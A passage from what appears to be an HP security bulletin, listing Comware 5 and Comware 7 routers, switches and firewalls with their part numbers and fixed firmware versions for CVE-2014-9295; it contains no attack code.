MSR 30 (Comware 5) R2513P45 JD654A HP MSR30-60 POE Multi-Service Router, JD657A HP MSR30-40 Multi-Service Router, JD658A HP MSR30-60 Multi-Service Router, JD660A HP MSR30-20 POE Multi-Service Router, JD661A HP MSR30-40 POE Multi-Service Router, JD666A HP MSR30-20 Multi-Service Router, JF229A HP MSR30-40 Router, JF230A HP MSR30-60 Router, JF232A HP RTMSR3040-AC-OVSAS-H3, JF235A HP MSR30-20 DC Router, JF284A HP MSR30-20 Router, JF287A HP MSR30-40 DC Router, JF801A HP MSR30-60 DC Router, JF802A HP MSR30-20 PoE Router, JF803A HP MSR30-40 PoE Router, JF804A HP MSR30-60 PoE Router H3C MSR 30-20 Router (0235A328), H3C MSR 30-40 Router Host(DC) (0235A268), H3C RT-MSR3020-AC-POE-OVS-H3 (0235A322), H3C RT-MSR3020-DC-OVS-H3 (0235A267), H3C RT-MSR3040-AC-OVS-H (0235A299), H3C RT-MSR3040-AC-POE-OVS-H3 (0235A323), H3C RT-MSR3060-AC-OVS-H3 (0235A320), H3C RT-MSR3060-AC-POE-OVS-H3 (0235A296), H3C RT-MSR3060-DC-OVS-H3 (0235A269), H3C MSR 30-20 RTVZ33020AS Router Host(AC) (0235A20S), H3C MSR 30-20 (0235A19L), H3C MSR 30-20 POE (0235A239), H3C MSR 30-40 (0235A20J), H3C MSR 30-40 POE (0235A25R), H3C MSR 30-60 (0235A20K), H3C MSR 30-60 POE (0235A25S), H3C RT-MSR3040-AC-OVS-AS-H3 (0235A20V) CVE-2014-9295
MSR 30-16 (Comware 5) R2513P45 JD659A HP MSR30-16 POE Multi-Service Router, JD665A HP MSR30-16 Multi-Service Router, JF233A HP MSR30-16 Router, JF234A HP MSR30-16 PoE Router, H3C RT-MSR3016-AC-OVS-H3 (0235A327), H3C RT-MSR3016-AC-POE-OVS-H3 (0235A321), H3C MSR 30-16 (0235A237), H3C MSR 30-16 POE (0235A238) CVE-2014-9295
MSR 30-1X (Comware 5) R2513P45 JF800A HP MSR30-11 Router, JF816A HP MSR30-10 2 FE /2 SIC /1 MIM MS Rtr, JG182A HP MSR30-11E Router, JG183A HP MSR30-11F Router, JG184A HP MSR30-10 DC Router 2FE 2SIC 1XMIM 256DDR (0235A39H), H3C RT-MSR3011-AC-OVS-H3 (0235A29L) CVE-2014-9295
MSR 50 (Comware 5) R2513P45 JD433A HP MSR50-40 Router, JD653A HP MSR50 Processor Module, JD655A HP MSR50-40 Multi-Service Router, JD656A HP MSR50-60 Multi-Service Router, JF231A HP MSR50-60 Router, JF285A HP MSR50-40 DC Router, JF640A HP MSR50-60 Rtr Chassis w DC PwrSupply H3C MSR 50-40 Router (0235A297), H3C MSR5040-DCOVS-H3C (0235A20P), H3C RT-MSR5060-AC-OVS-H3 (0235A298), H3C MSR 50-40 Chassis (0235A20N), H3C MSR 50-60 Chassis (0235A20L) CVE-2014-9295
MSR 50-G2 (Comware 5) R2513P45 JD429A HP MSR50 G2 Processor Module, JD429B HP MSR50 G2 Processor Module H3C H3C MSR 50 Processor Module-G2 (0231A84Q), H3C MSR 50 High Performance Main Processing Unit 3GE (Combo) 256F/1GD (0231A0KL) CVE-2014-9295
MSR 9XX (Comware 5) R2513P45 JF812A HP MSR900 Router, JF813A HP MSR920 Router, JF814A HP MSR900-W Router, JF815A HP MSR920 2FEWAN/8FELAN/.11 b/g Rtr, JG207A HP MSR900-W Router (NA), JG208A HP MSR920-W Router (NA) H3C MSR 900 Router with 802.11b/g 2 FE WAN 4 FE LAN 256DDR 802.11b (0235A0C2), H3C MSR 900 Router 2 FE WAN 4 FE LAN 256DDR (0235A0BX), H3C MSR 920 Router with 802.11b/g 2 FE WAN 8 FE LAN 256DDR (0235A0C4), H3C MSR 920 Router 2 FE WAN 8 FE LAN 256DDR (0235A0C0) CVE-2014-9295
MSR 93X (Comware 5) R2513P45 JG512A HP MSR930 Wireless Router, JG513A HP MSR930 3G Router, JG514A HP MSR931 Router, JG515A HP MSR931 3G Router, JG516A HP MSR933 Router, JG517A HP MSR933 3G Router, JG518A HP MSR935 Router, JG519A HP MSR935 Wireless Router, JG520A HP MSR935 3G Router, JG531A HP MSR931 Dual 3G Router, JG596A HP MSR930 4G LTE/3G CDMA Router, JG597A HP MSR936 Wireless Router, JG665A HP MSR930 4G LTE/3G WCDMA Global Router, JG704A HP MSR930 4G LTE/3G WCDMA ATT Router N/A CVE-2014-9295
MSR1000 (Comware 5) R2513P45 JG732A HP MSR1003-8 AC Router N/A CVE-2014-9295
MSR20 (Comware 5 - Low Encryption SW) R2513L61 JD663B HP MSR20-21 Router, JF228A HP MSR20-40 Router, JF283A HP MSR20-20 Router H3C RT-MSR2020-AC-OVS-H3C (0235A324), H3C RT-MSR2040-AC-OVS-H3 (0235A326) CVE-2014-9295
MSR20-1X (Comware 5 - Low Encryption SW) R2513L61 JD431A HP MSR20-10 Router, JF236A HP MSR20-15-I Router, JF237A HP MSR20-15-A Router, JF238A HP MSR20-15-I-W Router, JF239A HP MSR20-11 Router, JF240A HP MSR20-13 Router, JF241A HP MSR20-12 Router, JF806A HP MSR20-12-T Router, JF807A HP MSR20-12-W Router, JF808A HP MSR20-13-W Router, JF809A HP MSR20-15-A-W Router, JF817A HP MSR20-15 Router H3C MSR 20-10 (0235A0A7), H3C RT-MSR2015-AC-OVS-I-H3 (0235A394), H3C RT-MSR2015-AC-OVS-A-H3 (0235A392), H3C RT-MSR2015-AC-OVS-AW-H3 (0235A393), H3C RT-MSR2011-AC-OVS-H3 (0235A395), H3C RT-MSR2013-AC-OVS-H3 (0235A390), H3C RT-MSR2012-AC-OVS-H3 (0235A396), H3C RT-MSR2012-TAC-OVS-H3 (0235A398), H3C RT-MSR2012-AC-OVS-W-H3 (0235A397), H3C RT-MSR2013-AC-OVS-W-H3 (0235A391), H3C RT-MSR2015-AC-OVS-IW-H3 (0235A38V), H3C MSR 20-15 Router Host(AC) 1 FE 4 LSW 1 ADSLoPOTS 1 DSIC (0235A0A8) CVE-2014-9295
MSR30 (Comware 5 - Low Encryption SW) R2513L61 JF229A HP MSR30-40 Router, JF230A HP MSR30-60 Router, JF235A HP MSR30-20 DC Router, JF284A HP MSR30-20 Router, JF287A HP MSR30-40 DC Router, JF801A HP MSR30-60 DC Router, JF802A HP MSR30-20 PoE Router, JF803A HP MSR30-40 PoE Router, JF804A HP MSR30-60 PoE Router H3C RT-MSR3040-AC-OVS-H (0235A299), H3C RT-MSR3060-AC-OVS-H3 (0235A320), H3C RT-MSR3020-DC-OVS-H3 (0235A267), H3C MSR 30-20 Router (0235A328), H3C MSR 30-40 Router Host(DC) (0235A268), H3C RT-MSR3060-DC-OVS-H3 (0235A269), H3C RT-MSR3020-AC-POE-OVS-H3 (0235A322), H3C RT-MSR3040-AC-POE-OVS-H3 (0235A323), H3C RT-MSR3060-AC-POE-OVS-H3 (0235A296) CVE-2014-9295
MSR30-16 (Comware 5 - Low Encryption SW) R2513L61 JF233A HP MSR30-16 Router, JF234A HP MSR30-16 PoE Router H3C RT-MSR3016-AC-OVS-H3 (0235A327), H3C RT-MSR3016-AC-POE-OVS-H3 (0235A321) CVE-2014-9295
MSR30-1X (Comware 5 - Low Encryption SW) R2513L61 JF800A HP MSR30-11 Router, JF816A HP MSR30-10 2 FE /2 SIC /1 MIM MS Rtr, JG182A HP MSR30-11E Router, JG183A HP MSR30-11F Router, JG184A HP MSR30-10 DC Router H3C RT-MSR3011-AC-OVS-H3 (0235A29L), H3C MSR 30-10 Router Host(AC) 2FE 2SIC 1XMIM 256DDR (0235A39H) CVE-2014-9295
MSR50 (Comware 5 - Low Encryption SW) R2513L61 JD433A HP MSR50-40 Router, JD653A HP MSR50Processor Module, JD655A HP MSR50-40 Multi-Service Router, JD656A HP MSR50-60 Multi-Service Router, JF231A HP MSR50-60 Router, JF285A HP MSR50-40 DC Router, JF640A HP MSR50-60 Rtr Chassis w DC PwrSupply H3C MSR 50-40 Router (0235A297), H3C MSR 50 Processor Module (0231A791), H3C MSR 50-40 Chassis (0235A20N), H3C MSR 50-60 Chassis (0235A20L), H3C RT-MSR5060-AC-OVS-H3 (0235A298), H3C MSR5040-DCOVS-H3C (0235A20P) CVE-2014-9295
MSR50 G2 (Comware 5 - Low Encryption SW) R2513L61 JD429B HP MSR50 G2 Processor Module H3C MSR 50 High Performance Main Processing Unit 3GE (Combo) 256F/1GD (0231A0KL) CVE-2014-9295
12500 (Comware 5) R1828P06 JC085A HP A12518 Switch Chassis, JC086A HP A12508 Switch Chassis, JC652A HP 12508 DC Switch Chassis, JC653A HP 12518 DC Switch Chassis, JC654A HP 12504 AC Switch Chassis, JC655A HP 12504 DC Switch Chassis, JF430A HP A12518 Switch Chassis, JF430B HP 12518 Switch Chassis, JF430C HP 12518 AC Switch Chassis, JF431A HP A12508 Switch Chassis, JF431B HP 12508 Switch Chassis, JF431C HP 12508 AC Switch Chassis, JC072B HP 12500 Main Processing Unit, JC808A HP 12500 TAA Main Processing Unit H3C S12508 Routing Switch (AC-1) (0235A0GE), H3C S12518 Routing Switch (AC-1) (0235A0GF), H3C S12508 Chassis (0235A0E6), H3C S12508 Chassis (0235A38N), H3C S12518 Chassis (0235A0E7), H3C S12518 Chassis (0235A38M), H3C 12508 DC Switch Chassis (0235A38L), H3C 12518 DC Switch Chassis (0235A38K) CVE-2014-9295
9500E (Comware 5) R1828P06 JC124A HP A9508 Switch Chassis, JC124B HP 9505 Switch Chassis, JC125A HP A9512 Switch Chassis, JC125B HP 9512 Switch Chassis, JC474A HP A9508-V Switch Chassis, JC474B HP 9508-V Switch Chassis H3C S9505E Routing-Switch Chassis (0235A0G6), H3C S9512E Routing-Switch Chassis (0235A0G7), H3C S9508E-V Routing-Switch Chassis (0235A38Q), H3C S9505E Chassis w/ Fans (0235A38P), H3C S9512E Chassis w/ Fans (0235A38R) CVE-2014-9295
10500 (Comware 5) R1208P10 JC611A HP 10508-V Switch Chassis, JC612A HP 10508 Switch Chassis, JC613A HP 10504 Switch Chassis, JC614A HP 10500 Main Processing Unit, JC748A HP 10512 Switch Chassis, JG375A HP 10500 TAA-compliant Main Processing Unit, JG820A HP 10504 TAA-compliant Switch Chassis, JG821A HP 10508 TAA-compliant Switch Chassis, JG822A HP 10508-V TAA-compliant Switch Chassis, JG823A HP 10512 TAA-compliant Switch Chassis
CVE-2014-9295
7500 (Comware 5) R6708P10 JC666A HP 7503-S 144Gbps Fabric/MPU with PoE Upgradable 20-port Gig-T/4-port GbE Combo, JC697A HP 7502 TAA-compliant Main Processing Unit, JC698A HP 7503-S 144Gbps TAA Fabric / MPU with 16 GbE SFP Ports and 8 GbE Combo Ports, JC699A HP 7500 384Gbps TAA-compliant Fabric / MPU with 2 10GbE XFP Ports, JC700A HP 7500 384Gbps TAA-compliant Fabric / Main Processing Unit, JC701A HP 7500 768Gbps TAA-compliant Fabric / Main Processing Unit, JD193A HP 7500 384Gbps Fabric Module with 2 XFP Ports, JD193B HP 7500 384Gbps Fabric Module with 2 XFP Ports, JD194A HP 7500 384Gbps Fabric Module, JD194B HP 7500 384Gbps Fabric Module, JD195A HP 7500 384Gbps Advanced Fabric Module, JD196A HP 7502 Fabric Module, JD220A HP 7500 768Gbps Fabric Module, JD224A HP 7500 384Gbps Fabric Module with 12 SFP Ports, JD238A HP 7510 Switch Chassis, JD238B HP 7510 Switch Chassis, JD239A HP 7506 Switch Chassis, JD239B HP 7506 Switch Chassis, JD240A HP 7503 Switch Chassis, JD240B HP 7503 Switch Chassis, JD241A HP 7506-V Switch Chassis, JD241B HP 7506-V Switch Chassis, JD242A HP 7502 Switch Chassis, JD242B HP 7502 Switch Chassis, JD243A HP 7503-S Switch Chassis with 1 Fabric Slot, JD243B HP 7503-S Switch Chassis with 1 Fabric Slot, JE164A HP E7902 Switch Chassis, JE165A HP E7903 Switch Chassis, JE166A HP E7903 1 Fabric Slot Switch Chassis, JE167A HP E7906 Switch Chassis, JE168A HP E7906 Vertical Switch Chassis, JE169A HP E7910 Switch Chassis
CVE-2014-9295
5830 (Comware 5) R1118P11 JC691A HP 5830AF-48G Switch with 1 Interface Slot, JC694A HP 5830AF-96G Switch, JG316A HP 5830AF-48G TAA-compliant Switch w/1 Interface Slot, JG374A HP 5830AF-96G TAA-compliant Switch
CVE-2014-9295
5800 (Comware 5) R1809P03 JC099A HP 5800-24G-PoE Switch, JC099B HP 5800-24G-PoE+ Switch, JC100A HP 5800-24G Switch, JC100B HP 5800-24G Switch, JC101A HP 5800-48G Switch with 2 Slots, JC101B HP 5800-48G-PoE+ Switch with 2 Interface Slots, JC103A HP 5800-24G-SFP Switch, JC103B HP 5800-24G-SFP Switch with 1 Interface Slot, JC104A HP 5800-48G-PoE Switch, JC104B HP 5800-48G-PoE+ Switch with 1 Interface Slot, JC105A HP 5800-48G Switch, JC105B HP 5800-48G Switch with 1 Interface Slot, JG254A HP 5800-24G-PoE+ TAA-compliant Switch, JG254B HP 5800-24G-PoE+ TAA-compliant Switch, JG255A HP 5800-24G TAA-compliant Switch, JG255B HP 5800-24G TAA-compliant Switch, JG256A HP 5800-24G-SFP TAA-compliant Switch with 1 Interface Slot, JG256B HP 5800-24G-SFP TAA-compliant Switch with 1 Interface Slot, JG257A HP 5800-48G-PoE+ TAA-compliant Switch with 1 Interface Slot, JG257B HP 5800-48G-PoE+ TAA-compliant Switch with 1 Interface Slot, JG258A HP 5800-48G TAA-compliant Switch with 1 Interface Slot, JG258B HP 5800-48G TAA-compliant Switch with 1 Interface Slot, JG225A HP 5800AF-48G Switch, JG225B HP 5800AF-48G Switch, JG242A HP 5800-48G-PoE+ TAA-compliant Switch with 2 Interface Slots, JG242B HP 5800-48G-PoE+ TAA-compliant Switch with 2 Interface
CVE-2014-9295
5820 (Comware 5) R1809P03 JG243A HP 5820-24XG-SFP+ TAA-compliant Switch, JG243B HP 5820-24XG-SFP+ TAA-compliant Switch, JG259A HP 5820X-14XG-SFP+ TAA-compliant Switch with 2 Interface Slots & 1 OAA Slot, JG259B HP 5820-14XG-SFP+ TAA-compliant Switch with 2 Interface Slots and 1 OAA Slot, JC106A HP 5820-14XG-SFP+ Switch with 2 Slots, JC106B HP 5820-14XG-SFP+ Switch with 2 Interface Slots & 1 OAA Slot, JG219A HP 5820AF-24XG Switch, JG219B HP 5820AF-24XG Switch, JC102A HP 5820-24XG-SFP+ Switch, JC102B HP 5820-24XG-SFP+ Switch
CVE-2014-9295
5500 HI (Comware 5) R5501P06 JG311A HP 5500-24G-4SFP HI Switch with 2 Interface Slots, JG312A HP 5500-48G-4SFP HI Switch with 2 Interface Slots, JG541A HP 5500-24G-PoE+-4SFP HI Switch with 2 Interface Slots, JG542A HP 5500-48G-PoE+-4SFP HI Switch with 2 Interface Slots, JG543A HP 5500-24G-SFP HI Switch with 2 Interface Slots, JG679A HP 5500-24G-PoE+-4SFP HI TAA-compliant Switch with 2 Interface Slots, JG680A HP 5500-48G-PoE+-4SFP HI TAA-compliant Switch with 2 Interface Slots, JG681A HP 5500-24G-SFP HI TAA-compliant Switch with 2 Interface Slots
CVE-2014-9295
5500 EI (Comware 5) R2221P08 JD373A HP 5500-24G DC EI Switch, JD374A HP 5500-24G-SFP EI Switch, JD375A HP 5500-48G EI Switch, JD376A HP 5500-48G-PoE EI Switch, JD377A HP 5500-24G EI Switch, JD378A HP 5500-24G-PoE EI Switch, JD379A HP 5500-24G-SFP DC EI Switch, JG240A HP 5500-48G-PoE+ EI Switch with 2 Interface Slots, JG241A HP 5500-24G-PoE+ EI Switch with 2 Interface Slots, JG249A HP 5500-24G-SFP EI TAA-compliant Switch with 2 Interface, JG250A HP 5500-24G EI TAA-compliant Switch with 2 Interface Slots, JG251A HP 5500-48G EI TAA-compliant Switch with 2 Interface Slots, JG252A HP 5500-24G-PoE+ EI TAA-compliant Switch with 2 Interface Slots, JG253A HP 5500-48G-PoE+ EI TAA-compliant Switch with 2 Interface Slots
CVE-2014-9295
4800G (Comware 5) R2221P08 JD007A HP 4800-24G Switch, JD008A HP 4800-24G-PoE Switch, JD009A HP 4800-24G-SFP Switch, JD010A HP 4800-48G Switch, JD011A HP 4800-48G-PoE Switch
CVE-2014-9295
5500SI (Comware 5) R2221P08 JD369A HP 5500-24G SI Switch, JD370A HP 5500-48G SI Switch, JD371A HP 5500-24G-PoE SI Switch, JD372A HP 5500-48G-PoE SI Switch, JG238A HP 5500-24G-PoE+ SI Switch with 2 Interface Slots, JG239A HP 5500-48G-PoE+ SI Switch with 2 Interface Slots
CVE-2014-9295
4500G (Comware 5) R2221P08 JF428A HP 4510-48G Switch, JF847A HP 4510-24G Switch
CVE-2014-9295
5120 EI (Comware 5) R2221P08 JE066A HP 5120-24G EI Switch, JE067A HP 5120-48G EI Switch, JE068A HP 5120-24G EI Switch with 2 Interface Slots, JE069A HP 5120-48G EI Switch with 2 Interface Slots, JE070A HP 5120-24G-PoE EI 2-slot Switch, JE071A HP 5120-48G-PoE EI 2-slot Switch, JG236A HP 5120-24G-PoE+ EI Switch with 2 Interface Slots, JG237A HP 5120-48G-PoE+ EI Switch with 2 Interface Slots, JG245A HP 5120-24G EI TAA-compliant Switch with 2 Interface Slots, JG246A HP 5120-48G EI TAA-compliant Switch with 2 Interface Slots, JG247A HP 5120-24G-PoE+ EI TAA-compliant Switch with 2 Slots, JG248A HP 5120-48G-PoE+ EI TAA-compliant Switch with 2 Slots
CVE-2014-9295
4210G (Comware 5) R2221P08 JF844A HP 4210-24G Switch, JF845A HP 4210-48G Switch, JF846A HP 4210-24G-PoE Switch
CVE-2014-9295
5120 SI (Comware 5) R1513P95 JE072A HP 5120-48G SI Switch, JE073A HP 5120-16G SI Switch, JE074A HP 5120-24G SI Switch, JG091A HP 5120-24G-PoE+ (370W) SI Switch, JG092A HP 5120-24G-PoE+ (170W) SI Switch
CVE-2014-9295
3610 (Comware 5) R5319P10 JD335A HP 3610-48 Switch, JD336A HP 3610-24-4G-SFP Switch, JD337A HP 3610-24-2G-2G-SFP Switch, JD338A HP 3610-24-SFP Switch
CVE-2014-9295
3600V2 (Comware 5) R2110P03 JG299A HP 3600-24 v2 EI Switch, JG299B HP 3600-24 v2 EI Switch, JG300A HP 3600-48 v2 EI Switch, JG300B HP 3600-48 v2 EI Switch, JG301A HP 3600-24-PoE+ v2 EI Switch, JG301B HP 3600-24-PoE+ v2 EI Switch, JG301C HP 3600-24-PoE+ v2 EI Switch, JG302A HP 3600-48-PoE+ v2 EI Switch, JG302B HP 3600-48-PoE+ v2 EI Switch, JG302C HP 3600-48-PoE+ v2 EI Switch, JG303A HP 3600-24-SFP v2 EI Switch, JG303B HP 3600-24-SFP v2 EI Switch, JG304A HP 3600-24 v2 SI Switch, JG304B HP 3600-24 v2 SI Switch, JG305A HP 3600-48 v2 SI Switch, JG305B HP 3600-48 v2 SI Switch, JG306A HP 3600-24-PoE+ v2 SI Switch, JG306B HP 3600-24-PoE+ v2 SI Switch, JG306C HP 3600-24-PoE+ v2 SI Switch, JG307A HP 3600-48-PoE+ v2 SI Switch, JG307B HP 3600-48-PoE+ v2 SI Switch, JG307C HP 3600-48-PoE+ v2 SI Switch
CVE-2014-9295
3100V2-48 (Comware 5) R2110P03 JG315A HP 3100-48 v2 Switch, JG315B HP 3100-48 v2 Switch
CVE-2014-9295
3100V2 (Comware 5) R5203P11 JD313B HP 3100-24-PoE v2 EI Switch, JD318B HP 3100-8 v2 EI Switch, JD319B HP 3100-16 v2 EI Switch, JD320B HP 3100-24 v2 EI Switch, JG221A HP 3100-8 v2 SI Switch, JG222A HP 3100-16 v2 SI Switch, JG223A HP 3100-24 v2 SI Switch
CVE-2014-9295
HP870 (Comware 5) R2607P35 JG723A HP 870 Unified Wired-WLAN Appliance, JG725A HP 870 Unified Wired-WLAN TAA-compliant Appliance
CVE-2014-9295
HP850 (Comware 5) R2607P35 JG722A HP 850 Unified Wired-WLAN Appliance, JG724A HP 850 Unified Wired-WLAN TAA-compliant Appliance
CVE-2014-9295
HP830 (Comware 5) R3507P35 JG640A HP 830 24-Port PoE+ Unified Wired-WLAN Switch, JG641A HP 830 8-port PoE+ Unified Wired-WLAN Switch, JG646A HP 830 24-Port PoE+ Unified Wired-WLAN TAA-compliant Switch, JG647A HP 830 8-Port PoE+ Unified Wired-WLAN TAA-compliant
CVE-2014-9295
HP6000 (Comware 5) R2507P35 JG639A HP 10500/7500 20G Unified Wired-WLAN Module, JG645A HP 10500/7500 20G Unified Wired-WLAN TAA-compliant Module
CVE-2014-9295
WX5004-EI (Comware 5) R2507P35 JD447B HP WX5002 Access Controller, JD448A HP WX5004 Access Controller, JD448B HP WX5004 Access Controller, JD469A HP WX5004 Access Controller
CVE-2014-9295
SecBlade FW (Comware 5) R3181P05 JC635A HP 12500 VPN Firewall Module, JD245A HP 9500 VPN Firewall Module, JD249A HP 10500/7500 Advanced VPN Firewall Module, JD250A HP 6600 Firewall Processing Router Module, JD251A HP 8800 Firewall Processing Module, JD255A HP 5820 VPN Firewall Module
CVE-2014-9295
F1000-E (Comware 5) R3181P05 JD272A HP F1000-E VPN Firewall Appliance
CVE-2014-9295
F1000-A-EI (Comware 5) R3734P06 JG214A HP F1000-A-EI VPN Firewall Appliance
CVE-2014-9295
F1000-S-EI (Comware 5) R3734P06 JG213A HP F1000-S-EI VPN Firewall Appliance
CVE-2014-9295
F5000-A (Comware 5) F3210P23 JD259A HP A5000-A5 VPN Firewall Chassis, JG215A HP F5000 Firewall Main Processing Unit, JG216A HP F5000 Firewall Standalone Chassis
CVE-2014-9295
U200S and CS (Comware 5) F5123P31 JD273A HP U200-S UTM Appliance
CVE-2014-9295
U200A and M (Comware 5) F5123P31 JD275A HP U200-A UTM Appliance
CVE-2014-9295
F5000-C/S (Comware 5) R3811P03 JG650A HP F5000-C VPN Firewall Appliance, JG370A HP F5000-S VPN Firewall Appliance
CVE-2014-9295
SecBlade III (Comware 5) R3820P03 JG371A HP 12500 20Gbps VPN Firewall Module, JG372A HP 10500/11900/7500 20Gbps VPN Firewall Module
CVE-2014-9295
MSR20 RU (Comware 5 Low Encryption SW) R2513L61 JD432A HP A-MSR20-21 Router, JD662A HP MSR20-20 Router, JD663A HP A-MSR20-21 Router, JD663B HP MSR20-21 Router, JD664A HP MSR20-40 Router, JF228A HP MSR20-40, JF283A HP MSR20-20 Router
CVE-2014-9295
MSR20-1X RU (Comware 5 Low Encryption SW) R2513L61 JD431A HP MSR20-10 Router, JD667A HP A-MSR20-15 IW Multi-service Router, JD668A HP MSR20-13 Router, JD669A HP MSR20-13-W Router, JD670A HP A-MSR20-15 A Multi-service Router, JD671A HP A-MSR20-15 AW Multi-service Router, JD672A HP A-MSR20-15 I Multi-service Router, JD673A HP MSR20-11 Router, JD674A HP MSR20-12 Router, JD675A HP MSR20-12-W Router, JD676A HP MSR20-12-T Router, JF236A HP MSR20-15-I Router, JF237A HP MSR20-15-A Router, JF238A HP MSR20-15-I-W Router, JF239A HP MSR20-11 Router, JF240A HP MSR20-13 Router, JF241A HP MSR20-12 Router, JF806A HP MSR20-12-T Router, JF807A HP MSR20-12-W Router, JF808A HP MSR20-13-W Router, JF809A HP MSR20-15-A-W Router, JF817A HP MSR20-15 Router, JG209A HP MSR20-12-T-W Router, JG210A HP MSR20-13-W Router
CVE-2014-9295
MSR30 RU (Comware 5 Low Encryption SW) R2513L61 JD654A HP MSR30-60 PoE Router, JD657A HP MSR30-40 Router, JD658A HP MSR30-60 Router, JD660A HP MSR30-20 PoE Router, JD661A HP MSR30-40 PoE Router, JD666A HP MSR30-20 Router, JF229A HP MSR30-40 Router, JF230A HP MSR30-60 Router, JF232A HP A-MSR30-40 (RT-MSR3040-AC-OVS-AS-H3) Multi-service Router, JF235A HP MSR30-20 DC Router, JF284A HP MSR30-20 Router, JF287A HP MSR30-40 DC Router, JF801A HP MSR30-60 DC Router, JF802A HP MSR30-20 PoE Router, JF803A HP MSR30-40 PoE Router, JF804A HP MSR30-60 PoE Router, JG728A HP MSR30-20 TAA-compliant DC Router, JG729A HP MSR30-20 TAA-compliant Router
CVE-2014-9295
MSR301X RU (Comware 5 Low Encryption SW) R2513L61 JF800A HP MSR30-11 Router, JF816A HP MSR30-10 Router, JG182A HP MSR30-11E Router, JG183A HP MSR30-11F Router, JG184A HP MSR30-10 DC Router
CVE-2014-9295
MSR316 RU (Comware 5 Low Encryption SW) R2513L61 JD659A HP MSR30-16 PoE Router, JD665A HP MSR30-16 Router, JF233A HP MSR30-16 Router, JF234A HP MSR30-16 PoE Router
CVE-2014-9295
MSR50 RU (Comware 5 Low Encryption SW) R2513L61 JD433A HP MSR50-40 Router, JD653A HP MSR50 Processor Module, JD655A HP MSR 50-40 Router, JD656A HP MSR50-60 Router, JF231A HP MSR50-60 Router, JF285A HP MSR50-40 DC Router, JF640A HP MSR50-60 Router Chassis with DC Power Supply
CVE-2014-9295
MSR50 EPU RU (Comware 5 Low Encryption SW) R2513L61 JD429A HP MSR50 G2 Processor Module, JD429B HP MSR50 G2 Processor Module, JD433A HP MSR50-40 Router, JD655A HP MSR 50-40 Router, JD656A HP MSR50-60 Router, JF231A HP MSR50-60 Router, JF285A HP MSR50-40 DC Router, JF640A HP MSR50-60 Router Chassis with DC Power Supply
CVE-2014-9295
MSR1000 RU (Comware 5 Low Encryption SW) R2513L61 JG732A HP MSR1003-8 AC Router
CVE-2014-9295
6600 RSE RU (Comware 5 Low Encryption SW) R3303P18 JC566A HP 6600 RSE-X1 Router Main Processing Unit, JG780A HP 6600 RSE-X1 TAA-compliant Main Processing Unit
CVE-2014-9295
6600 RPE RU (Comware 5 Low Encryption SW) R3303P18 JC165A) HP 6600 RPE-X1 Router Module, JG781A) HP 6600 RPE-X1 TAA-compliant Main Processing Unit
CVE-2014-9295
6602 RU (Comware 5 Low Encryption SW) R3303P18 JC176A) HP 6602 Router Chassis
CVE-2014-9295
HSR6602 RU (Comware 5 Low Encryption SW) R3303P18 JC177A HP 6608 Router, JC177B HP 6608 Router Chassis, JC178A HP 6604 Router Chassis, JC178B HP 6604 Router Chassis, JC496A HP 6616 Router Chassis, JG353A HP HSR6602-G Router, JG354A HP HSR6602-XG Router, JG355A HP 6600 MCP-X1 Router Main Processing Unit, JG356A HP 6600 MCP-X2 Router Main Processing Unit, JG776A HP HSR6602-G TAA-compliant Router, JG777A HP HSR6602-XG TAA-compliant Router, JG778A HP 6600 MCP-X2 Router TAA-compliant Main Processing Unit
CVE-2014-9295
HSR6800 RU (Comware 5 Low Encryption SW) R3303P18 JG361A HP HSR6802 Router Chassis, JG362A HP HSR6804 Router Chassis, JG363A HP HSR6808 Router Chassis, JG364A HP HSR6800 RSE-X2 Router Main Processing Unit, JG779A HP HSR6800 RSE-X2 Router TAA-compliant Main Processing Unit
CVE-2014-9295
SMB1910 (Comware 5) R1108 JG540A HP 1910-48 Switch, JG539A HP 1910-24-PoE+ Switch, JG538A HP 1910-24 Switch, JG537A HP 1910-8 -PoE+ Switch, JG536A HP 1910-8 Switch
CVE-2014-9295
SMB1920 (Comware 5) R1106 JG928A HP 1920-48G-PoE+ (370W) Switch, JG927A HP 1920-48G Switch, JG926A HP 1920-24G-PoE+ (370W) Switch, JG925A HP 1920-24G-PoE+ (180W) Switch, JG924A HP 1920-24G Switch, JG923A HP 1920-16G Switch, JG922A HP 1920-8G-PoE+ (180W) Switch, JG921A HP 1920-8G-PoE+ (65W) Switch, JG920A HP 1920-8G Switch
CVE-2014-9295
V1910 (Comware 5) R1513P95 JE005A HP 1910-16G Switch, JE006A HP 1910-24G Switch, JE007A HP 1910-24G-PoE (365W) Switch, JE008A HP 1910-24G-PoE(170W) Switch, JE009A HP 1910-48G Switch, JG348A HP 1910-8G Switch, JG349A HP 1910-8G-PoE+ (65W) Switch, JG350A HP 1910-8G-PoE+ (180W) Switch
CVE-2014-9295
SMB 1620 (Comware 5) R1105 JG914A HP 1620-48G Switch, JG913A HP 1620-24G Switch, JG912A HP 1620-8G Switch
CVE-2014-9295
COMWARE 7 Products
12500 (Comware 7) R7328P04 JC085A HP A12518 Switch Chassis, JC086A HP A12508 Switch Chassis, JC652A HP 12508 DC Switch Chassis, JC653A HP 12518 DC Switch Chassis, JC654A HP 12504 AC Switch Chassis, JC655A HP 12504 DC Switch Chassis, JF430A HP A12518 Switch Chassis, JF430B HP 12518 Switch Chassis, JF430C HP 12518 AC Switch Chassis, JF431A HP A12508 Switch Chassis, JF431B HP 12508 Switch Chassis, JF431C HP 12508 AC Switch Chassis, JC072B HP 12500 Main Processing Unit, JG497A HP 12500 MPU w/Comware V7 OS, JG782A HP FF 12508E AC Switch Chassis, JG783A HP FF 12508E DC Switch Chassis, JG784A HP FF 12518E AC Switch Chassis, JG785A HP FF 12518E DC Switch Chassis, JG802A HP FF 12500E MPU, JG836A HP FlexFabric 12518E AC Switch TAA-compliant Chassis, JG834A HP FlexFabric 12508E AC Switch TAA-compliant Chassis, JG835A HP FlexFabric 12508E DC Switch TAA-compliant Chassis, JG837A HP FlexFabric 12518E DC Switch TAA-compliant Chassis, JG803A HP FlexFabric 12500E TAA-compliant Main Processing Unit, JG796A HP FlexFabric 12500 48-port 10GbE SFP+ FD Module, JG790A HP FlexFabric 12500 16-port 40GbE QSFP+ FD Module, JG794A HP FlexFabric 12500 40-port 10GbE SFP+ FG Module, JG792A HP FlexFabric 12500 40-port 10GbE SFP+ FD Module, JG788A HP FlexFabric 12500 4-port 100GbE CFP FG Module, JG786A HP FlexFabric 12500 4-port 100GbE CFP FD Module, JG797A HP FlexFabric 12500 48-port 10GbE SFP+ FD TAA-compliant Module, JG791A HP FlexFabric 12500 16-port 40GbE QSFP+ FD TAA-compliant Module, JG795A HP FlexFabric 12500 40-port 10GbE SFP+ FG TAA-compliant Module, JG793A HP FlexFabric 12500 